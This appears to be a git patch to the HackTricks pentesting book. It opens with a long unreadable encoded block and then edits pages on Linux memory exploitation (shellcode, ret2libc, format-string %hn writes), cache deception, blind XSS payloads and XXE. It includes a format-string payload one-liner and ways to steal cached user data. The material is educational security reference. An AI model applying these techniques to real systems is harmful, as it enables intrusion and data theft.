z=SH4c*EFCU@?-~%G*o)W%0kscR1>ra-t*f(gZ&my5M6}lc^Pz6y7`q{~%+LV;Fbp}&N$ad9fN70ZB;1t;^Y!;oJ*`S2O z7yAA)A!@$VPu%Gres9=3;(sFoZOaQzuo5Z}6Z>yPk82i+tVjlS_qXOcUv2qryUj`< zjm+F%);`Sv8|;-weN{SV3yCujxhok%m?IoZRAe_5ir7Wnz=OkoWlxRzX(_vjw~i`3 zfJ?F1Ph_>ZR=tK-xOZ_x0+4CJV-1yMz^7u8(?=3PoNW8>p*(B#G`iSgY9#yXY93m) zo|_4W%d%gAksz(Ck;cmoc`Bi+@k&n16UKk!3PL=SCMt~zHQhHE^(qqO5fSJ2;R++H z-;(AU0z#DGKt{w5sc@}t7bdvm@k_sG9{RG``SR6*#f)ZBgEp5_T{uGc4)XZu=w#u- zIf%bgE&xCKQoJjYrprKwPhTJ+zQoiAjwFt{63kGDWitmSAkY@!RB9N(N9HJ2K5YX!-cWG1j^Czn&4QJdA(w+saX~Bh2FL zlZ0tf{|Lz(nB{cCKg1sk;TZy`z)7|g;RHBT2*6P48IZk%GMFs>7S6{0_pZ$BPzw21l-AxaSr(O>{ttt^l!pJ^U0^Zd%RGQM9vB4Tvanav z`%aUABt2nmqo@4H$>vzXS74s0Fy||c+TZ`Dtg{Sjv+3G(TdWj!x8UyX5ZsFeDH^o6 zyAy&FBzP%KfuhAJUc5*tR@|Y*okHPDpXYtQz4x*I<;UdCk(o8KX4YKib(=-lY|`1E z-vhE*fbG~R`zh&}VY8)7AZoGDPg8s4o40Wc64oy0GRVrL7n>gy&a&XHL;IT|>Ke=^ zKVh@{c;b7uI=lTQ6nySM#*}P_oI4V)EIz@zlwj=Bx!UPYvb7I{qe1&vKr!}5C6z$C zXhvcPJCx!5+W8-ms~hL#&$2=k6EaC~q|_9*?6E1h9WGriR{q9{FhyLGq|Vi-WnNnV zny;(bpw_*R6{vdIxv`L6V(D=I_a78c5Ps{$BeMO5S4d zji{!N!KNp(Ma;Aj_Z`}FP$hF7j9N;u_$p!7&CzV`)4nN?($IIo{N#n_!~+K!Tu4~H zEq`dg^^QX-F9mt@gy||>9Vqxmpu=4VbV2l`{0|ux{Bn6UY;{UWl2=ml3}jE9mO_^d ze>n#mApvIcCDPi)I^$vHp@vJgLQep`JEzwyi3QasO4x@q+Fzl_bH6dByjw&epGZ@* zZGJ%HytqyAlQ82^VEWv>d<&=_2PS6wSsUs6GYNf^K@9CE@dpaWBW^F!`uhk%;gIGi zIyJ#;b&s6#Q(+^{{%wMJ;~bUAxg1yb!LbLGJS!7`joCvhh;#yKndafW z4!3GcsIsyjNhN;^nWDM`#V2OSPx&r59X?R`xgClQ#Hg~SEI3MgN6{QXLuvIQnn{g* zlTU2D@=0&|h4vTvj~`tVaA#44OctK!CUYyI(!7fp{-af20;c_aYIt%aDJv6EB_z9f*rb<6dp9?zrfsunV7>8%Mp+sFrI>rjUku! zBxob_eOfW|Ur1vo3(I7<9K|`(X-Wa80or)&4(e4bbN1$=&=f;eQz1%ca2BZcy&Kg= z$)|vk^4tG-l!r77AQe_RMmcMXwu@Hd@%9}x7E+%@MlMb*SkrD_1{z7MzA1`2c&%W~ zt=H{?KktUK=VvP~Hz4>ngt|t(&hjwoSfoW1O=B#zp229O+&o!jrgZ~8h>n`|jiBC_ z)faiR%WPR3A(cUq=Q{vV7nfPc!wppdScuvc&V#-~U)J=8TW@Q`T}5sZgku$7_lrMR z>cPF@BCtIgN*k}{!^6#%j!?}`VSZPOQaNAaP#96sg1Q7+SG8-wdXfC zTH&&lioj)wpb)g4k2gF9RkBgl&*GD$pFR4a2d9HY#*%nXo{$h$33Or&1HxpU$*HH_ zJj!}dX#N&vEuANu5$F^t>`9|+s0=qcQ&~N3SCS=}mNr$nUs{9*MUju09va$dU7Py9 zh6kKs5;18{mKj?WsU>@%Md!@tVi8DqhGTM|OorWFQ0one>E}Bfu8KiKgvCF+o2|*TCX>eCe{Sz0WhK68Bk`WAvwynI04?cs=FP6qaLCGY;2x1_1>$Ce3 z-@-;?I(@L5jt}~^59_c)ogoVVn$wa&cX7H{rz__iXsLd zq06>eZN@|h-&1hbNC%3j>BGD28*dHiDjrH`LRfn<9=z)_6Bk zq5m)@i?JT4eA9+6_P&6YwJ4@~@X?d9aih612nbQWeb`8+wA>XJ;(fIhFt`;t+jePM z+50K=7p);XkEbGzg*%&+Nj3y)J6}W8k3YBZRk|%dRVpiaj_M)?8PshKler*8AXsc5 ziZC8U4Lxo1oaM6Q&Q-=Sl?-VJJYC1Vo28uvR%{Osjwkcn72m^Lcz9lBVvJ4kGTr=N zy^jhXzwOtP|LA?P9o%m%oUyye!0V&tWeOXleKD!wlJd@^OX7G1HIw}x4~T(Htic@l ztEQ88@lEdQ=b0FLM8NH?^Oz`M+RCTboln20)(2TT|ETk-yLijvOHTF%wFX0{axUP< z%s0y@K*F@MW6AaMQc+x$E0&N0l0*Mr^vgXoeud?)toVFix03y}hA`w$qdTt0E6=U9 zJSh=z431G9oH;F5_Cqi)PZlw>o!=8S#9g0-9`#>RvNOb~OI$2En@aPb*#1ks#8aJx zDsQbV#Lq~lF8JRbt|C#Iq&)w?hK5whrnA4l0Mfah&|nL-t-*p-I$3_a^P+JGe6$f-2|^-jdi^P7 z-&V&~{$GCPl)?P9TRI=bPXTge%nL-w@It;EtuD0djxh!710CP^rMtRmb?Yi>pL2nJ zYRNdvoK`h{$Gv*Y=c7<%1aw)6u8~AU@7;qj7yK|aTBFylIS{`^S;u3f=*VhOh^6!3 zmQm>Y%4T;deIS^=9;`UKQ`|;Jfp(93n$QQ)-&XcvrK$luZl_)sej!+dT#3Ci7p1V1}^FFBGF#YcIn;pjV*t9N_L%iZfg0r9VSHBXmYOt$ANW)|_ zExu)ek`}X+gd{QEG{5`$koWL$Bhj8ahAY;d43MD-VR)dh{w-z!!SF1L3SgjnrM?Nr zz2J}v!UPnRZT-jk0;}6vq=i=pOqMXK3o}@EUcDrMewIhZ(-_a4bcK9b(Eh?BzdTwxZbM zZ(6-*H(?awqf~J9$*-CD2oic6f+?`Pavi2z&O>25V@(?eP`!PTM=KXrMBZ+kv^Zr? zf=!e~`}Oy;-O5SJVNx9Zli>8lDJgr2qgXyh*D=koPq!wYQff(&uLhWaIHZxv8APdB zScoQnAt31z0B>S=`;%GLV1ASh-;fjO8-u+U0Iu^Z&KWJj*Z~mQ$~IG$>KHB%(mYI* z{>;dq-l=%6;~9PV`=xISXjXsx*C%}0wRpv4Yr7LNy= z>~%!E6k>iKVLm0(m*$TxL77RgUT67Jh+qT?EM!$ZL6C{v5GV?e5FG+5;jAvQtzN3n%{;Wc64-L6!Xw6TV@C zBlRxz))^a-)}+XCHp#<);u(nR<@48fc4E*OA6;8{wFuPLD8hL*|1eOFtz#s)nSM4x zpGqib^)bWS8}P1qbKfV8L@#S2?^L|CpxxBz`YQjsslSlyM)+`Nayr9~P=*D{AScw0 zhrq)qCGoDEojp0BWNqk5H3D0!H23vjH@-gkQm@op3|C|%JUI{fR}vzU;d~cI6MN|_ zjX>p-&m;x4;J&=DmoVABsgc_`4w&W(*r84vc2$J#zyac1NGND274(nRYdSi+-ogEa zW6@pVOWhYXQeMwtc>;(SaWUHqd-?o>36`kEo!Z4I9@CtWq_%JE;2^yr>%~Ub9vXdn zqNgoKXLqX{F5X$ck+h3h433tQT%la#>Bfn+ZO2t~9;2KLa5}Uja`AX*&y#M46Hh45 z+v-AWG{KO?P&DgI*$?K-guRTE#I3%?yeG(GaI8R(Q}kKm&) zZp^Eq5>YF|gL^fk_KoD(|9|jS={RJ!x=Y)>33tgrC&hhKE7IfAn;CkWs`X4;@);Z7 zvO(84@3>-DS|bn)rF6?iQi~BUqFI&bY_J;JHne~ z8pxRsVkWp}ctEggmsG@0A|Hugzd=1muBwc)!+X{qhf{W=WSdUBxlB?K#78+eDrdSZ zvlD7+T{KBp&srx|eGbw){)}N7ib0P!(Tq2`y(eq^)HZ}s@18k(6BNZ5co38$TMVbJj;>6VXUb>u5#&sh zSk{K%h*8ZG;Lb31m0OHf$*A3_FM8ClTq}$^4etUOa#;UnhyP0N5Zj3#%ueCPv#58Y zQrhseOUkIiKomVz>o)fKsd|_uVN(*K#Tdo=u^d#5Gx53v(8BJUDj=RG(L&Pr&!gK% z^3(N8a>8%#*re_11qslU6bc(~gzJ|df(Sh-+CD~(xC}b+)prR|rxA=Rdm-^BE~+#4 z$Bzy3tsMI?u0i`42#Q#TTPP>a1o9X)RSU;sy1y$HH;bTFDK4fQ+k=d2`;AHoF2YcJ z7}_J1lf6cRM9gXwEETv;<@n$v3)*n!{&hn7>LjyvY{^m2=}tzZ6P$WWrvhNmnH;st zWV23o66AzE*j)vCw;#!6EXD3AG;nW|QUNw})@?11-!LiDkn7a9>nsOlIDbh_i)>}3 zNBf?Rtrpozn@|>60UHG`Wt;E{S#nyuw(giPBJKoaSXzOr6_g*Qcp9#Zy%Tu#Yw=xv ze*Vg$`dsj$o=#)hyW{MG$Ey?ZKMziwuQDTcYv;QL)7KAHX53t?Mdv2CdLc$#yyO9p z^*h~!xjl4!e|)88E*bxnE8R|4vRia?!8#X2EM|0b_l1ZEmNF#qT_jSjK-N{bS6v4jTG?{MGin+H)u#8+zZY8 z#!_ua!```@LW}wj%56Q4+Mvo70L3Y;mato+tNV%2+=Y3!>@%reQY`olefg8j-dB*@ zOaSYj0_@`Wc8W&hx{G*>+lSI4P*XKVRp9;EN~!tTViKzBq&!i(S@%m!>Vcf>G`G8} zj?;by4t9VwX?~!-kWBNt(2Qj zZI#n)A{gf#5&mMGMKASsdiwCFi|3S84+*UMfudq&Z?HFc_nVob&^ADh-`Yv=KBWZ+ zpa{t6;4M3J*>qh*$sSbz&U1t#CCF4sH1nfuaxx=z;D0 zZElR?pgZ! zWhNciOTzU=9Pg&VK*0|ncPDc3BUa@1soq0FAih*rG2#5k9f>JW)uim%XM#FDX|%LG zv)6mXnkTnvMKQ8D8Li^s!UW6KkG$C~?8( zHnb}0Lea@l)?Rl-A-y92PXqkrqDRyS#G~}I%7Q#YF=`BO@HWq#O1&Tvpa&UnzgK#AF<9{dMcK$qnf2G0am{CvquIo@kf_x z<{eVyjLi|r3U?O|hBS%Iz=W>Iu-6J2$Z0(z=;wtGy%wMPzUWHO0mA#pwRVbcI2_N` z_vC;@yWfkQWk!^C3AX#~m$bnrcFMrRBF3V<xO!nJ+F0VY4Hu6NpfYO%0J2<9FoDQO@$krn>COvrVGEh;Bv@BEQ0U(l zeW*oNNQ%IyikJaXJOBU~6`IHJ)YIOxrTB%;JraLtK|IrKtOp9MGl1GujE*j>2vbK?^#madfevU zk*8h-va1;cHt&XM^p%xm?9-Gq;o_Y(WX7(GbZH0a;5Kbd)#L>D;YQ&(6LtT0PM9`W zo?P4RBko%RZ9H@hp>g<8{BTU3>Ft%Z22YHNP=fD$tPh#zv^Gs*9MtR)HBdSldOI9u zdjUdDK_ftPT-vS`ba|R}b;ZMB-VDIY^+=7vc|ioQl2u*&IR);=T{51kbfcl3e*wT| zJ18us=4NHa^KWehB)2&WK7%9ZLI81_kAyi|A%xh4s<1$Uq%EUw2( zCkb^_w+=~n(J%Hlb$@%f5b3HpBZ1+9<;w|*$93J;pu-SB*^y|B!;KWIt(A}>^X9*C zHwXkWhsu8sEr9xsgrOK}4B9th7;pCi87X$R!F&=mdWD`A4FM?z%^1fuPd!E%%<<3< z7WrI@JcMmYz^JaDWEYXUGxyFYCsrM29=oD%<0qzVEHEHOiN0(I+ zH)rZz38u0_V|A@O#lFw-)Q3hqvKy~?8s0qRu!-18j1K$6z%$k4K0vit)*+J24_nNE zew3J>unp@TfDFisZuc43C1v6k1$SBQ4TZwN0Gi5?Xq;Jy>^~hZd-u2Fv0@P&|II8+ z_GdQ-fRcPC+cfU-Fe7JMHkbZv1o8>5I9JHB^GbJH{jE&gxM550-0d3AFr>HTHxu6b z7dsi*Au%4C3=G?scUOc3kAssf zfSZ{PF$YFmH5uw38&8aHe7D_Iq_Y_D_2(jCSkLsUa;8({#(bbMG`s z9BmBhlov|v9aJVSLsvoiqr+Y?;$vVwD*CarbM8a!TMAPV;L+umXO5$c+WNuUU` zT|e4f8`P~~qj#s2RDYfwhP9Un6E+bDbjcVC6#>h00gSi%$_W8QM4HzmC)Wh==etFP zQb|By#H{&ah(Y3S?)aC?NC7`vXziw(pPj$YQ;tZ(x(l3wukAAZXn52CvkXI`oqu7a zV!cr(t&q8s+;3@Ml>a)>`1fzbw}{6tWu}_8I#z1q5E^@ zC-)AshzY?m9CkUb7L$C#32qi7sV^d^wd=kPiXinKeJW|@K| z?`s!LPB1OE!j|88F6@ihpIEFZA3QOmPwl`L=AhT6UKV&{;E)%Yc0g*BG`i-G<@4^@ z#IdW=481vT!^#_dQwyep0j+DdeBN?W5i%RHw||)M3W@d^7>YRwY#KHSC-A|b#-5Rg zqeZh@9RmXPC;mw;a-qd3t2ESOL^ORAaT-{cdVd@YUu<0nCKOfxFFK`X6&YRx7l2T`*#y~94z zG^TW0_81*zc4y|Rt;q2%fr>=t$$9YGjZq1WsI@XZcJ&WJLf)A|`iKW)WYECSGr+Qn zOrLh%?`jQ^F1l$bT%V3Wnw{)n7~LV?g})fGKU{7}HCT2o8Gafw{X0@w(EZu&^{X{4 zAcv5#lb=kQMAkl7KDU_gTII7_OK4m~jjMLuHrDq1S6v;9ep-s3>Su|~bPCrYpBDCs zF!RXzzFd^QH+8cAYzkNkp5<3MKCW7JBP8L4cCTq~A05AEp<0L=M?<#drh60fiXekC|ePu<=|ImN91h{yyJ2dS1zK4PX?JOM{J2EEXD2b%Y=Y%!bGozpw zui+9&gS9hauWz`YYKb&M)vi5weuwm)kF`QctIR9mP_V>w$jjnvQrELhBcNYq#&1$r zf0lPcAO)dRSHw;tb6#;&i8~3AyzNEziBex`9jY>oa(msO2w*)X;)#-djN+WeDBZdS}iRC!iD?DDf>zS2n5hEb4#cj0@)yfg+@3(+*xKHbx zFbB~5eDb@wv$)Z`$kg4Y*1!>j3p{f`t;zH8U zUCT>0+r0QIx2EXCjUVG?Zt**QmT+z|GEawnEI^W>XqxzgOzUV+@$C7XvF=cA=0kDnJ2Iv%FLVY2wodLh1PnFaSDBQV~bgC7rY%aG2cAA zyAbi*)HuwkT8?A#TXoDVYz<+!0{|K7kC=}Y7-o)vh29)4q|Sp~n1Q%Tl%SWIjnU}C zF~xk^l^(CNubl`#JQBMwzDLnWci1rFHqYFAT?Y)B%r*N%E7g8U|IXQWR06L(hH|pU zvwg9dE>fhy8HL#UQZWlND`t=xHN4;{G3G~&;?{$=-y_EQw`q-vGpV;CV7|Z^v%CSa zL)WjmpR2h4yest-oS_L_<6Vz}F^eKz6`=L^9Rc(7AnDJ~`F~RIcGRO_&6awIsRKhK zBfchba;Q_eeC$Mu3BAQCzi%$wf>6}g{qiyOHS%b_R​ ``` -**EJ usando el Stack\(/bin/sh\):** - +**EJ usando el Stack\(/bin/sh\):** ```text section .text @@ -182,7 +179,7 @@ sc: ;Aquí va el shellcode ``` -1. **Atacando el Frame Pointer \(EBP\)** +1. **Atacando el Frame Pointer \(EBP\)** Útil en una situación en la que podemos modificar el EBP pero no el EIP. @@ -232,7 +229,7 @@ De esta forma el EIP se sobreescribirá con la dirección de system la cual reci Es posible encontrarse en la situación de que algún byte de alguna dirección de alguna función sea nulo o espacio \(\x20\). En ese caso se pueden desensamblar las direcciones anteriores a dicha función pues probablemente haya varios NOPs que nos permitan poder llamar a alguno de ellos en vez de a la función directamente \(por ejemplo con > x/8i system-4\). -Este método funciona pues al llamar a una función como system usando el opcode **ret** en vez de **call**, la función entiende que los primeros 4bytes serán la dirección **EIP** a la que volver. +Este método funciona pues al llamar a una función como system usando el opcode **ret** en vez de **call**, la función entiende que los primeros 4bytes serán la dirección **EIP** a la que volver. Una técnica interesante con este método es el llamar a **strncpy\(\)** para mover un payload del stack al heap y posteriormente usar **gets\(\)** para ejecutar dicho payload. @@ -249,9 +246,10 @@ De esta forma se pueden encadenar funciones a las que llamar. Además, si se qui Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecución de varias funciones a través del EBP y de "leave;ret" -RELLENO -+ Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: \(&system\(\) + &leave;ret + &“/bin/sh”\) -+ En el EIP ponemos de dirección una función &\(leave;ret\) +RELLENO + +* Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: \(&system\(\) + &leave;ret + &“/bin/sh”\) +* En el EIP ponemos de dirección una función &\(leave;ret\) Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + &system\(\) + &\(leave;ret;\) + &”/bin/sh” @@ -273,7 +271,9 @@ El exploit quedaría: SHELLCODE + Relleno \(hasta EIP\) + **&ret** \(los siguien Al parecer funciones como **strncpy** una vez completas eliminan de la pila la dirección donde estaba guardada la shellcode imposibilitando esta técnica. Es decir, la dirección que pasan a la función como argumento \(la que guarda la shellcode\) es modificada por un 0x00 por lo que al llamar al segundo **ret** se encuentra con un 0x00 y el programa muere. - **Ret2PopRet** +```text + **Ret2PopRet** +``` Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el tercero, podemos sobreescribir EIP con una dirección a pop-ret o pop-pop-ret, según la que necesitemos. @@ -420,9 +420,9 @@ If HOB < LOB If HOB > LOB `[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]` -HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB +HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB -\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\` +\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\` ### **Format String Exploit Template** @@ -441,8 +441,8 @@ objdump -s -j .fini_array ./greeting Contents of section .fini_array: 8049934 a0850408 - -#Put your address in 0x8049934 + +#Put your address in 0x8049934 ``` Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln. @@ -473,7 +473,7 @@ Nowadays is very **weird to find a binary with a dtor section**. {% endhint %} The destructor are functions that are **executed before program finishes**. -If you manage to **write** an **address** to a **shellcode** in **`__DTOR_END__`** , that will be **executed** before the programs ends. +If you manage to **write** an **address** to a **shellcode** in **`__DTOR_END__`** , that will be **executed** before the programs ends. Get the address of this section with: ```bash @@ -488,7 +488,7 @@ Usually you will find the **DTOR** section **between** the values `ffffffff` and Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to. For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow. -### **\_\_atexit Structures** +### **\_\_atexit Structures** {% hint style="danger" %} Nowadays is very **weird to exploit this**. @@ -653,7 +653,7 @@ So what's the **bypass**? The typical bypass I use is to just don't write to mem Note that in order for this to happen the binary needs to know previous to execution the addresses to the functions: * Lazy binding: The address of a function is searched the first time the function is called. So, the GOT needs to have write permissions during execution. -* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. ``**`-z relro`** `y` **`-z now`** +* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. ```**``-z relro`**`y`**`-z now\`\*\* To check if a program uses Bind now you can do: @@ -663,8 +663,6 @@ readelf -l /proc/ID_PROC/exe | grep BIND_NOW \*\*\*\* - - Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT \(Procedure Linkage Table\), de aquí se realiza un salto \(jmp\) a la GOT y descubre que esa entrada no ha sido resuelta \(contiene una dirección siguiente de la PLT\). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT. Cuando se llama a una función se llama a la PLT, esta tiene la dirección de la GOT donde se almacena la dirección de la función, por lo que redirige el flujo allí y así se llama a la función. Sin embargo, si es la primera vez que se llama a la función, lo que hay en la GOT es la siguiente instrucción de la PLT, por lo tanto el flujo sigue el código de la PLT \(rtfd\) y averigua la dirección de la función, la guarda en la GOT y la llama. @@ -673,7 +671,7 @@ Al cargar un binario en memoria el compilador le ha dicho en qué offset tiene q Lazy binding —> La dirección de la función se busca la primera vez que se invoca dicha función, por lo que la GOT tiene permisos de escritura para que cuando se busque, se guarde ahí y no haya que volver a buscarla. -Bind now —> Las direcciones de las funciones se buscan al cargar el programa y se cambian los permisos de las secciones .got, .dtors, .ctors, .dynamic, .jcr a solo lectura. **-z relro** y **-z now** +Bind now —> Las direcciones de las funciones se buscan al cargar el programa y se cambian los permisos de las secciones .got, .dtors, .ctors, .dynamic, .jcr a solo lectura. **-z relro** y **-z now** A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles. @@ -689,7 +687,7 @@ strcpy\(but, source\); La identifica como insegura y entonces cambia strcpy\(\) por \_\_strcpy\_chk\(\) utilizando el tamaño del buffer como tamaño máximo a copiar. -La diferencia entre **=1** o **=2** es que: +La diferencia entre **=1** o **=2** es que: La segunda no permite que **%n** venga de una sección con permisos de escritura. Además el parámetro para acceso directo de argumentos solo puede ser usado si se usan los anteriores, es decir, solo se pueda usar **%3$d** si antes se ha usado **%2$d** y **%1$d** @@ -717,7 +715,7 @@ Para las funciones que usen el EBP como registro para apuntar a los argumentos a #### **Jaulas con chroot\(\)** -debootstrap -arch=i386 hardy /home/user —> Instala un sistema básico bajo un subdirectorio específico +debootstrap -arch=i386 hardy /home/user —> Instala un sistema básico bajo un subdirectorio específico Un admin puede salir de una de estas jaulas haciendo: mkdir foo; chroot foo; cd .. @@ -732,16 +730,16 @@ Insure++ **Trozo asignado** -prev\_size \| -size \| —Cabecera +prev\_size \| +size \| —Cabecera \*mem \| Datos **Trozo libre** -prev\_size \| -size \| -\*fd \| Ptr forward chunk -\*bk \| Ptr back chunk —Cabecera +prev\_size \| +size \| +\*fd \| Ptr forward chunk +\*bk \| Ptr back chunk —Cabecera \*mem \| Datos Los trozos libres están en una lista doblemente enlazada \(bin\) y nunca pueden haber dos trozos libres juntos \(se juntan\) @@ -948,7 +946,7 @@ Si modificamos el size para que de 16 en vez de 8 entonces: fastbin\_index\(\) n Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET -Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0. +Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0. El **av->max\_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones. @@ -1004,7 +1002,7 @@ Es importante saber que el size del nuevo trozo wilderness sea más grande que l Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado. -Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max\_fast \(72normalmente\) y menos a MIN\_LARGE\_SIZE \(512\). +Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max\_fast \(72normalmente\) y menos a MIN\_LARGE\_SIZE \(512\). Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo: @@ -1052,7 +1050,7 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu **objdump -d ejecutable** —> Disas functions **objdump -d ./PROGRAMA \| grep FUNCION** —> Get function address -**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes +**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes **objdump -t ./exec \| grep varBss** —> Tabla de símbolos, para sacar address de variables y funciones **objdump -TR ./exec \| grep exit\(func lib\)** —> Para sacar address de funciones de librerías \(GOT\) **objdump -d ./exec \| grep funcCode diff --git a/exploiting/linux-exploiting-basic-esp/format-strings-template.md b/exploiting/linux-exploiting-basic-esp/format-strings-template.md index 3bb3e237..87f07f45 100644 --- a/exploiting/linux-exploiting-basic-esp/format-strings-template.md +++ b/exploiting/linux-exploiting-basic-esp/format-strings-template.md @@ -60,7 +60,7 @@ def connect_binary(): def send_payload(payload): payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD log.info("payload = %s" % repr(payload)) - if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED. To mae it shorter consider changing the c% for x%") + if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") P.sendline(payload) sleep(0.5) return P.recv() @@ -86,7 +86,7 @@ def get_formatstring_config(): if b"42424242" in recieved: log.info(f"Found offset ({offset}) and padlen ({padlen})") return offset, padlen - + else: connect_binary() payload = b" " + payload diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md index f8ba4a81..280662e9 100644 --- a/linux-unix/linux-privilege-escalation-checklist.md +++ b/linux-unix/linux-privilege-escalation-checklist.md @@ -154,7 +154,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. -![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png) +![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\* diff --git a/pentesting-methodology.md b/pentesting-methodology.md index 3bfee491..743accf7 100644 --- a/pentesting-methodology.md +++ b/pentesting-methodology.md @@ -18,7 +18,7 @@ If you want to **share some tricks with the community** you can also submit **pu ## 0- Physical Attacks -Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](physical-attacks/physical-attacks.md) and others about ****[**escaping from GUI applications**](physical-attacks/escaping-from-gui-applications/). +Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](physical-attacks/physical-attacks.md) and others about **\*\*\[**escaping from GUI applications\*\*\]\(physical-attacks/escaping-from-gui-applications/\). ## 1 - [Discovering hosts inside the network ](pentesting/pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/) diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md index 38015d3d..ce24c54c 100644 --- a/pentesting-web/cache-deception.md +++ b/pentesting-web/cache-deception.md @@ -9,7 +9,7 @@ ## Cache Poisoning -The goal of poisoning the cache is to make the clients load unexpected resources partially or totally controlled by the attacker. +The goal of poisoning the cache is to make the **clients load unexpected resources partially or totally controlled by the attacker**. The poisoned response will only be served to users who visit the affected page while the cache is poisoned. As a result, the impact can range from non-existent to massive depending on whether the page is popular or not. In order to perform a cache poisoning attack you need first to **identify ukeyed inputs** \(parameters not needed to appear on the the cached request but that change the returned page\), see **how to abuse** this parameter and **get the response cached**. @@ -91,9 +91,11 @@ Learn here about how to perform [Cache Poisoning attacks abusing HTTP Request Sm ## Cache Deception -The goal of Cache Deception is to make clients load resources that are going to be saved by the cache with their sensitive information. -A very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712). +The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**. +First of all note that **extensions** such as `.css`, `.js`, `.png` etc are usually **configured** to be **saved** in the **cache.** Therefore, if you access w_ww.example.com/profile.php/nonexistent.js_ the cache will probably store the response because it sees the `.js` **extension**. But, if the **application** is **replaying** with the **sensitive** user contents stored in _www.example.com/profile.php_, you can **steal** those contents from other users. + +Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712). In the example it is explained that if you load a non-existent page like _http://www.example.com/home.php/non-existent.css_ the content of _http://www.example.com/home.php_ \(**with the users sensitive information**\) is going to be returned and the cache server is going to save the result. Then, the **attacker** can access _http://www.example.com/home.php_ and see the **confidential information** of the users that accessed before. diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 7b392a2e..03409a80 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -837,6 +837,8 @@ There is **C2** dedicated to the **exploitation of Service Workers** called [**S ### Blind XSS payloads +You can also use: [https://xsshunter.com/](https://xsshunter.com/) + ```markup "> "> diff --git a/pentesting-web/xxe-xee-xml-external-entity.md b/pentesting-web/xxe-xee-xml-external-entity.md index eb11b160..24a450ce 100644 --- a/pentesting-web/xxe-xee-xml-external-entity.md +++ b/pentesting-web/xxe-xee-xml-external-entity.md @@ -295,6 +295,47 @@ Testing 0 entities : [] Testing 0 entities : [] ``` +### XXE via Office Open XML Parsers + +\(Copied from [**here**](https://labs.detectify.com/2021/09/30/10-types-web-vulnerabilities-often-missed/)\) +Many web applications allow you to upload Microsoft Office 